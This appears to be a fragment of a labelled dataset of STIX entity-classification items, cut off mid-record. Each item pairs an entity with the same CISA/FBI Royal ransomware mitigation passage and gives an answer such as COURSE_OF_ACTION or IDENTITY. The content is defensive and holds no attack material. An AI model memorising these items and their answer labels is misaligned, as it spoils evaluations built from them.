"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nStore passwords in hashed format using industry-recognized password managers\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nNIST\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nUse longer passwords consisting of at least 8 characters and no more than 64 characters in length\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nDisable command-line and scripting activities and permissions\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRequire administrator credentials to install software\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nIdentify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of 